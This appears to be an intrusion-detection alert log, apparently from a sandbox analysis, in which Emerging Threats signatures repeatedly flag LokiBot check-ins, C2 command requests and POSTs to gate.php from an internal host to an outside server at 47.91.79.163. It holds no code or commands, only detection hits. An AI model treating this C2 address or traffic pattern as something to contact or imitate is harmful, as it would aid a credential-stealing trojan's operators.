                                    12/03/20-10:03:42.127761TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991980192.168.2.347.91.79.163
                                    12/03/20-10:03:42.191510TCP2025483ET TROJAN LokiBot Fake 404 Response804991947.91.79.163192.168.2.3
                                    12/03/20-10:03:42.798963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992080192.168.2.347.91.79.163
                                    12/03/20-10:03:42.798963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992080192.168.2.347.91.79.163
                                    12/03/20-10:03:42.798963TCP2025381ET TROJAN LokiBot Checkin4992080192.168.2.347.91.79.163
                                    12/03/20-10:03:42.798963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992080192.168.2.347.91.79.163
                                    12/03/20-10:03:42.798963TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992080192.168.2.347.91.79.163
                                    12/03/20-10:03:42.862197TCP2025483ET TROJAN LokiBot Fake 404 Response804992047.91.79.163192.168.2.3
                                    12/03/20-10:03:43.096434TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.2.347.91.79.163
                                    12/03/20-10:03:43.096434TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.2.347.91.79.163
                                    12/03/20-10:03:43.096434TCP2025381ET TROJAN LokiBot Checkin4992180192.168.2.347.91.79.163
                                    12/03/20-10:03:43.096434TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.2.347.91.79.163
                                    12/03/20-10:03:43.096434TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992180192.168.2.347.91.79.163
                                    12/03/20-10:03:43.192491TCP2025483ET TROJAN LokiBot Fake 404 Response804992147.91.79.163192.168.2.3
                                    12/03/20-10:03:43.408716TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992280192.168.2.347.91.79.163
                                    12/03/20-10:03:43.408716TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992280192.168.2.347.91.79.163
                                    12/03/20-10:03:43.408716TCP2025381ET TROJAN LokiBot Checkin4992280192.168.2.347.91.79.163
                                    12/03/20-10:03:43.408716TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992280192.168.2.347.91.79.163
                                    12/03/20-10:03:43.408716TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992280192.168.2.347.91.79.163
                                    12/03/20-10:03:43.473149TCP2025483ET TROJAN LokiBot Fake 404 Response804992247.91.79.163192.168.2.3
                                    12/03/20-10:03:43.685042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.2.347.91.79.163
                                    12/03/20-10:03:43.685042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.2.347.91.79.163
                                    12/03/20-10:03:43.685042TCP2025381ET TROJAN LokiBot Checkin4992380192.168.2.347.91.79.163
                                    12/03/20-10:03:43.685042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.2.347.91.79.163
                                    12/03/20-10:03:43.685042TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992380192.168.2.347.91.79.163
                                    12/03/20-10:03:43.770552TCP2025483ET TROJAN LokiBot Fake 404 Response804992347.91.79.163192.168.2.3
                                    12/03/20-10:03:44.011091TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.2.347.91.79.163
                                    12/03/20-10:03:44.011091TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.2.347.91.79.163
                                    12/03/20-10:03:44.011091TCP2025381ET TROJAN LokiBot Checkin4992480192.168.2.347.91.79.163
                                    12/03/20-10:03:44.011091TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.2.347.91.79.163
                                    12/03/20-10:03:44.011091TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992480192.168.2.347.91.79.163
                                    12/03/20-10:03:44.159612TCP2025483ET TROJAN LokiBot Fake 404 Response804992447.91.79.163192.168.2.3
                                    12/03/20-10:03:44.400610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.2.347.91.79.163
                                    12/03/20-10:03:44.400610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.2.347.91.79.163
                                    12/03/20-10:03:44.400610TCP2025381ET TROJAN LokiBot Checkin4992580192.168.2.347.91.79.163
                                    12/03/20-10:03:44.400610TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.2.347.91.79.163
                                    12/03/20-10:03:44.400610TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992580192.168.2.347.91.79.163
                                    12/03/20-10:03:44.459861TCP2025483ET TROJAN LokiBot Fake 404 Response804992547.91.79.163192.168.2.3
                                    12/03/20-10:03:44.672942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.2.347.91.79.163
                                    12/03/20-10:03:44.672942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.2.347.91.79.163
                                    12/03/20-10:03:44.672942TCP2025381ET TROJAN LokiBot Checkin4992680192.168.2.347.91.79.163
                                    12/03/20-10:03:44.672942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.2.347.91.79.163
                                    12/03/20-10:03:44.672942TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992680192.168.2.347.91.79.163
                                    12/03/20-10:03:44.739667TCP2025483ET TROJAN LokiBot Fake 404 Response804992647.91.79.163192.168.2.3
                                    12/03/20-10:03:44.968766TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.2.347.91.79.163
                                    12/03/20-10:03:44.968766TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.2.347.91.79.163
                                    12/03/20-10:03:44.968766TCP2025381ET TROJAN LokiBot Checkin4992780192.168.2.347.91.79.163
                                    12/03/20-10:03:44.968766TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.2.347.91.79.163
                                    12/03/20-10:03:44.968766TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992780192.168.2.347.91.79.163
                                    12/03/20-10:03:45.026278TCP2025483ET TROJAN LokiBot Fake 404 Response804992747.91.79.163192.168.2.3
                                    12/03/20-10:03:45.253695TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.2.347.91.79.163
                                    12/03/20-10:03:45.253695TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.2.347.91.79.163
                                    12/03/20-10:03:45.253695TCP2025381ET TROJAN LokiBot Checkin4992880192.168.2.347.91.79.163
                                    12/03/20-10:03:45.253695TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.2.347.91.79.163
                                    12/03/20-10:03:45.253695TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992880192.168.2.347.91.79.163
                                    12/03/20-10:03:45.313153TCP2025483ET TROJAN LokiBot Fake 404 Response804992847.91.79.163192.168.2.3
                                    12/03/20-10:03:45.764949TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.2.347.91.79.163
                                    12/03/20-10:03:45.764949TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.2.347.91.79.163
                                    12/03/20-10:03:45.764949TCP2025381ET TROJAN LokiBot Checkin4992980192.168.2.347.91.79.163
                                    12/03/20-10:03:45.764949TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.2.347.91.79.163
                                    12/03/20-10:03:45.764949TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992980192.168.2.347.91.79.163
                                    12/03/20-10:03:45.849650TCP2025483ET TROJAN LokiBot Fake 404 Response804992947.91.79.163192.168.2.3
                                    12/03/20-10:03:46.322025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.2.347.91.79.163
                                    12/03/20-10:03:46.322025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.2.347.91.79.163
                                    12/03/20-10:03:46.322025TCP2025381ET TROJAN LokiBot Checkin4993080192.168.2.347.91.79.163
                                    12/03/20-10:03:46.322025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.2.347.91.79.163
                                    12/03/20-10:03:46.322025TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993080192.168.2.347.91.79.163
                                    12/03/20-10:03:46.379667TCP2025483ET TROJAN LokiBot Fake 404 Response804993047.91.79.163192.168.2.3
                                    12/03/20-10:03:46.794392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.2.347.91.79.163
                                    12/03/20-10:03:46.794392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.2.347.91.79.163
                                    12/03/20-10:03:46.794392TCP2025381ET TROJAN LokiBot Checkin4993180192.168.2.347.91.79.163
                                    12/03/20-10:03:46.794392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.2.347.91.79.163
                                    12/03/20-10:03:46.794392TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993180192.168.2.347.91.79.163
                                    12/03/20-10:03:46.855204TCP2025483ET TROJAN LokiBot Fake 404 Response804993147.91.79.163192.168.2.3
                                    12/03/20-10:03:47.319622TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.2.347.91.79.163
                                    12/03/20-10:03:47.319622TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.2.347.91.79.163
                                    12/03/20-10:03:47.319622TCP2025381ET TROJAN LokiBot Checkin4993280192.168.2.347.91.79.163
                                    12/03/20-10:03:47.319622TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.2.347.91.79.163
                                    12/03/20-10:03:47.319622TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993280192.168.2.347.91.79.163
                                    12/03/20-10:03:47.379466TCP2025483ET TROJAN LokiBot Fake 404 Response804993247.91.79.163192.168.2.3
                                    12/03/20-10:03:47.887303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.2.347.91.79.163
                                    12/03/20-10:03:47.887303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.2.347.91.79.163
                                    12/03/20-10:03:47.887303TCP2025381ET TROJAN LokiBot Checkin4993380192.168.2.347.91.79.163
                                    12/03/20-10:03:47.887303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.2.347.91.79.163
                                    12/03/20-10:03:47.887303TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993380192.168.2.347.91.79.163
                                    12/03/20-10:03:47.950901TCP2025483ET TROJAN LokiBot Fake 404 Response804993347.91.79.163192.168.2.3
                                    12/03/20-10:03:48.444667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.2.347.91.79.163
                                    12/03/20-10:03:48.444667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.2.347.91.79.163
                                    12/03/20-10:03:48.444667TCP2025381ET TROJAN LokiBot Checkin4993480192.168.2.347.91.79.163
                                    12/03/20-10:03:48.444667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.2.347.91.79.163
                                    12/03/20-10:03:48.444667TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993480192.168.2.347.91.79.163
                                    12/03/20-10:03:48.504372TCP2025483ET TROJAN LokiBot Fake 404 Response804993447.91.79.163192.168.2.3
                                    12/03/20-10:03:48.999385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.2.347.91.79.163
                                    12/03/20-10:03:48.999385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.2.347.91.79.163
                                    12/03/20-10:03:48.999385TCP2025381ET TROJAN LokiBot Checkin4993580192.168.2.347.91.79.163
                                    12/03/20-10:03:48.999385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.2.347.91.79.163
                                    12/03/20-10:03:48.999385TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993580192.168.2.347.91.79.163
                                    12/03/20-10:03:49.146350TCP2025483ET TROJAN LokiBot Fake 404 Response804993547.91.79.163192.168.2.3
                                    12/03/20-10:03:49.389665TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.2.347.91.79.163
                                    12/03/20-10:03:49.389665TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.2.347.91.79.163
                                    12/03/20-10:03:49.389665TCP2025381ET TROJAN LokiBot Checkin4993680192.168.2.347.91.79.163
                                    12/03/20-10:03:49.389665TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.2.347.91.79.163
                                    12/03/20-10:03:49.389665TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993680192.168.2.347.91.79.163
                                    12/03/20-10:03:49.483880TCP2025483ET TROJAN LokiBot Fake 404 Response804993647.91.79.163192.168.2.3
                                    12/03/20-10:03:49.706677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.2.347.91.79.163
                                    12/03/20-10:03:49.706677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.2.347.91.79.163
                                    12/03/20-10:03:49.706677TCP2025381ET TROJAN LokiBot Checkin4993780192.168.2.347.91.79.163
                                    12/03/20-10:03:49.706677TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.2.347.91.79.163
                                    12/03/20-10:03:49.706677TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993780192.168.2.347.91.79.163
                                    12/03/20-10:03:49.772139TCP2025483ET TROJAN LokiBot Fake 404 Response804993747.91.79.163192.168.2.3
                                    12/03/20-10:03:50.340955TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.2.347.91.79.163
                                    12/03/20-10:03:50.340955TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.2.347.91.79.163
                                    12/03/20-10:03:50.340955TCP2025381ET TROJAN LokiBot Checkin4993880192.168.2.347.91.79.163
                                    12/03/20-10:03:50.340955TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.2.347.91.79.163
                                    12/03/20-10:03:50.340955TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993880192.168.2.347.91.79.163
                                    12/03/20-10:03:50.486014TCP2025483ET TROJAN LokiBot Fake 404 Response804993847.91.79.163192.168.2.3
                                    12/03/20-10:03:50.701367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.2.347.91.79.163
                                    12/03/20-10:03:50.701367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.2.347.91.79.163
                                    12/03/20-10:03:50.701367TCP2025381ET TROJAN LokiBot Checkin4993980192.168.2.347.91.79.163
                                    12/03/20-10:03:50.701367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.2.347.91.79.163
                                    12/03/20-10:03:50.701367TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993980192.168.2.347.91.79.163
                                    12/03/20-10:03:50.762480TCP2025483ET TROJAN LokiBot Fake 404 Response804993947.91.79.163192.168.2.3
                                    12/03/20-10:03:51.232876TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994180192.168.2.347.91.79.163
                                    12/03/20-10:03:51.232876TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994180192.168.2.347.91.79.163
                                    12/03/20-10:03:51.232876TCP2025381ET TROJAN LokiBot Checkin4994180192.168.2.347.91.79.163
                                    12/03/20-10:03:51.232876TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994180192.168.2.347.91.79.163
                                    12/03/20-10:03:51.232876TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994180192.168.2.347.91.79.163
                                    12/03/20-10:03:51.295295TCP2025483ET TROJAN LokiBot Fake 404 Response804994147.91.79.163192.168.2.3
                                    12/03/20-10:03:51.745747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994280192.168.2.347.91.79.163
                                    12/03/20-10:03:51.745747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994280192.168.2.347.91.79.163
                                    12/03/20-10:03:51.745747TCP2025381ET TROJAN LokiBot Checkin4994280192.168.2.347.91.79.163
                                    12/03/20-10:03:51.745747TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994280192.168.2.347.91.79.163
                                    12/03/20-10:03:51.745747TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994280192.168.2.347.91.79.163
                                    12/03/20-10:03:51.805430TCP2025483ET TROJAN LokiBot Fake 404 Response804994247.91.79.163192.168.2.3
                                    12/03/20-10:03:52.011532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994480192.168.2.347.91.79.163
                                    12/03/20-10:03:52.011532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994480192.168.2.347.91.79.163
                                    12/03/20-10:03:52.011532TCP2025381ET TROJAN LokiBot Checkin4994480192.168.2.347.91.79.163
                                    12/03/20-10:03:52.011532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994480192.168.2.347.91.79.163
                                    12/03/20-10:03:52.011532TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994480192.168.2.347.91.79.163
                                    12/03/20-10:03:52.069458TCP2025483ET TROJAN LokiBot Fake 404 Response804994447.91.79.163192.168.2.3
                                    12/03/20-10:03:52.540726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994580192.168.2.347.91.79.163
                                    12/03/20-10:03:52.540726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994580192.168.2.347.91.79.163
                                    12/03/20-10:03:52.540726TCP2025381ET TROJAN LokiBot Checkin4994580192.168.2.347.91.79.163
                                    12/03/20-10:03:52.540726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994580192.168.2.347.91.79.163
                                    12/03/20-10:03:52.540726TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994580192.168.2.347.91.79.163
                                    12/03/20-10:03:52.673837TCP2025483ET TROJAN LokiBot Fake 404 Response804994547.91.79.163192.168.2.3
                                    12/03/20-10:03:53.132190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994680192.168.2.347.91.79.163
                                    12/03/20-10:03:53.132190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994680192.168.2.347.91.79.163
                                    12/03/20-10:03:53.132190TCP2025381ET TROJAN LokiBot Checkin4994680192.168.2.347.91.79.163
                                    12/03/20-10:03:53.132190TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994680192.168.2.347.91.79.163
                                    12/03/20-10:03:53.132190TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994680192.168.2.347.91.79.163
                                    12/03/20-10:03:53.203317TCP2025483ET TROJAN LokiBot Fake 404 Response804994647.91.79.163192.168.2.3
                                    12/03/20-10:03:53.741500TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994880192.168.2.347.91.79.163
                                    12/03/20-10:03:53.741500TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994880192.168.2.347.91.79.163
                                    12/03/20-10:03:53.741500TCP2025381ET TROJAN LokiBot Checkin4994880192.168.2.347.91.79.163
                                    12/03/20-10:03:53.741500TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994880192.168.2.347.91.79.163
                                    12/03/20-10:03:53.741500TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994880192.168.2.347.91.79.163
                                    12/03/20-10:03:53.800650TCP2025483ET TROJAN LokiBot Fake 404 Response804994847.91.79.163192.168.2.3
                                    12/03/20-10:03:54.013312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994980192.168.2.347.91.79.163
                                    12/03/20-10:03:54.013312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994980192.168.2.347.91.79.163
                                    12/03/20-10:03:54.013312TCP2025381ET TROJAN LokiBot Checkin4994980192.168.2.347.91.79.163
                                    12/03/20-10:03:54.013312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994980192.168.2.347.91.79.163
                                    12/03/20-10:03:54.013312TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994980192.168.2.347.91.79.163
                                    12/03/20-10:03:54.074158TCP2025483ET TROJAN LokiBot Fake 404 Response804994947.91.79.163192.168.2.3
                                    12/03/20-10:03:54.573092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995080192.168.2.347.91.79.163
                                    12/03/20-10:03:54.573092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995080192.168.2.347.91.79.163
                                    12/03/20-10:03:54.573092TCP2025381ET TROJAN LokiBot Checkin4995080192.168.2.347.91.79.163
                                    12/03/20-10:03:54.573092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995080192.168.2.347.91.79.163
                                    12/03/20-10:03:54.573092TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995080192.168.2.347.91.79.163
                                    12/03/20-10:03:54.632228TCP2025483ET TROJAN LokiBot Fake 404 Response804995047.91.79.163192.168.2.3
                                    12/03/20-10:03:55.156588TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995180192.168.2.347.91.79.163
                                    12/03/20-10:03:55.156588TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995180192.168.2.347.91.79.163
                                    12/03/20-10:03:55.156588TCP2025381ET TROJAN LokiBot Checkin4995180192.168.2.347.91.79.163
                                    12/03/20-10:03:55.156588TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995180192.168.2.347.91.79.163
                                    12/03/20-10:03:55.156588TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995180192.168.2.347.91.79.163
                                    12/03/20-10:03:55.378946TCP2025483ET TROJAN LokiBot Fake 404 Response804995147.91.79.163192.168.2.3
                                    12/03/20-10:03:55.853547TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995380192.168.2.347.91.79.163
                                    12/03/20-10:03:55.853547TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995380192.168.2.347.91.79.163
                                    12/03/20-10:03:55.853547TCP2025381ET TROJAN LokiBot Checkin4995380192.168.2.347.91.79.163
                                    12/03/20-10:03:55.853547TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995380192.168.2.347.91.79.163
                                    12/03/20-10:03:55.853547TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995380192.168.2.347.91.79.163
                                    12/03/20-10:03:55.913942TCP2025483ET TROJAN LokiBot Fake 404 Response804995347.91.79.163192.168.2.3
                                    12/03/20-10:03:56.114180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995480192.168.2.347.91.79.163
                                    12/03/20-10:03:56.114180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995480192.168.2.347.91.79.163
                                    12/03/20-10:03:56.114180TCP2025381ET TROJAN LokiBot Checkin4995480192.168.2.347.91.79.163
                                    12/03/20-10:03:56.114180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995480192.168.2.347.91.79.163
                                    12/03/20-10:03:56.114180TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995480192.168.2.347.91.79.163
                                    12/03/20-10:03:56.172661TCP2025483ET TROJAN LokiBot Fake 404 Response804995447.91.79.163192.168.2.3
                                    12/03/20-10:03:56.633629TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995580192.168.2.347.91.79.163
                                    12/03/20-10:03:56.633629TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995580192.168.2.347.91.79.163
                                    12/03/20-10:03:56.633629TCP2025381ET TROJAN LokiBot Checkin4995580192.168.2.347.91.79.163
                                    12/03/20-10:03:56.633629TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995580192.168.2.347.91.79.163
                                    12/03/20-10:03:56.633629TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995580192.168.2.347.91.79.163
                                    12/03/20-10:03:56.693409TCP2025483ET TROJAN LokiBot Fake 404 Response804995547.91.79.163192.168.2.3
                                    12/03/20-10:03:57.149827TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995680192.168.2.347.91.79.163
                                    12/03/20-10:03:57.149827TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995680192.168.2.347.91.79.163
                                    12/03/20-10:03:57.149827TCP2025381ET TROJAN LokiBot Checkin4995680192.168.2.347.91.79.163
                                    12/03/20-10:03:57.149827TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995680192.168.2.347.91.79.163
                                    12/03/20-10:03:57.149827TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995680192.168.2.347.91.79.163
                                    12/03/20-10:03:57.219339TCP2025483ET TROJAN LokiBot Fake 404 Response804995647.91.79.163192.168.2.3
                                    12/03/20-10:03:57.692003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995780192.168.2.347.91.79.163
                                    12/03/20-10:03:57.692003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995780192.168.2.347.91.79.163
                                    12/03/20-10:03:57.692003TCP2025381ET TROJAN LokiBot Checkin4995780192.168.2.347.91.79.163
                                    12/03/20-10:03:57.692003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995780192.168.2.347.91.79.163
                                    12/03/20-10:03:57.692003TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995780192.168.2.347.91.79.163
                                    12/03/20-10:03:57.753940TCP2025483ET TROJAN LokiBot Fake 404 Response804995747.91.79.163192.168.2.3
                                    12/03/20-10:03:58.283328TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995880192.168.2.347.91.79.163
                                    12/03/20-10:03:58.283328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995880192.168.2.347.91.79.163
                                    12/03/20-10:03:58.283328TCP2025381ET TROJAN LokiBot Checkin4995880192.168.2.347.91.79.163
                                    12/03/20-10:03:58.283328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995880192.168.2.347.91.79.163
                                    12/03/20-10:03:58.283328TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995880192.168.2.347.91.79.163
                                    12/03/20-10:03:58.343102TCP2025483ET TROJAN LokiBot Fake 404 Response804995847.91.79.163192.168.2.3
                                    12/03/20-10:03:58.547963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995980192.168.2.347.91.79.163
                                    12/03/20-10:03:58.547963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995980192.168.2.347.91.79.163
                                    12/03/20-10:03:58.547963TCP2025381ET TROJAN LokiBot Checkin4995980192.168.2.347.91.79.163
                                    12/03/20-10:03:58.547963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995980192.168.2.347.91.79.163
                                    12/03/20-10:03:58.547963TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995980192.168.2.347.91.79.163
                                    12/03/20-10:03:58.604919TCP2025483ET TROJAN LokiBot Fake 404 Response804995947.91.79.163192.168.2.3
                                    12/03/20-10:03:58.821965TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996080192.168.2.347.91.79.163
                                    12/03/20-10:03:58.821965TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996080192.168.2.347.91.79.163
                                    12/03/20-10:03:58.821965TCP2025381ET TROJAN LokiBot Checkin4996080192.168.2.347.91.79.163
                                    12/03/20-10:03:58.821965TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996080192.168.2.347.91.79.163
                                    12/03/20-10:03:58.821965TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996080192.168.2.347.91.79.163
                                    12/03/20-10:03:58.886666TCP2025483ET TROJAN LokiBot Fake 404 Response804996047.91.79.163192.168.2.3
                                    12/03/20-10:03:59.097646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996180192.168.2.347.91.79.163
                                    12/03/20-10:03:59.097646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996180192.168.2.347.91.79.163
                                    12/03/20-10:03:59.097646TCP2025381ET TROJAN LokiBot Checkin4996180192.168.2.347.91.79.163
                                    12/03/20-10:03:59.097646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996180192.168.2.347.91.79.163
                                    12/03/20-10:03:59.097646TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996180192.168.2.347.91.79.163
                                    12/03/20-10:03:59.154859TCP2025483ET TROJAN LokiBot Fake 404 Response804996147.91.79.163192.168.2.3
                                    12/03/20-10:03:59.376610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996280192.168.2.347.91.79.163
                                    12/03/20-10:03:59.376610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996280192.168.2.347.91.79.163
                                    12/03/20-10:03:59.376610TCP2025381ET TROJAN LokiBot Checkin4996280192.168.2.347.91.79.163
                                    12/03/20-10:03:59.376610TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996280192.168.2.347.91.79.163
                                    12/03/20-10:03:59.376610TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996280192.168.2.347.91.79.163
                                    12/03/20-10:03:59.446843TCP2025483ET TROJAN LokiBot Fake 404 Response804996247.91.79.163192.168.2.3
                                    12/03/20-10:03:59.658099TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996380192.168.2.347.91.79.163
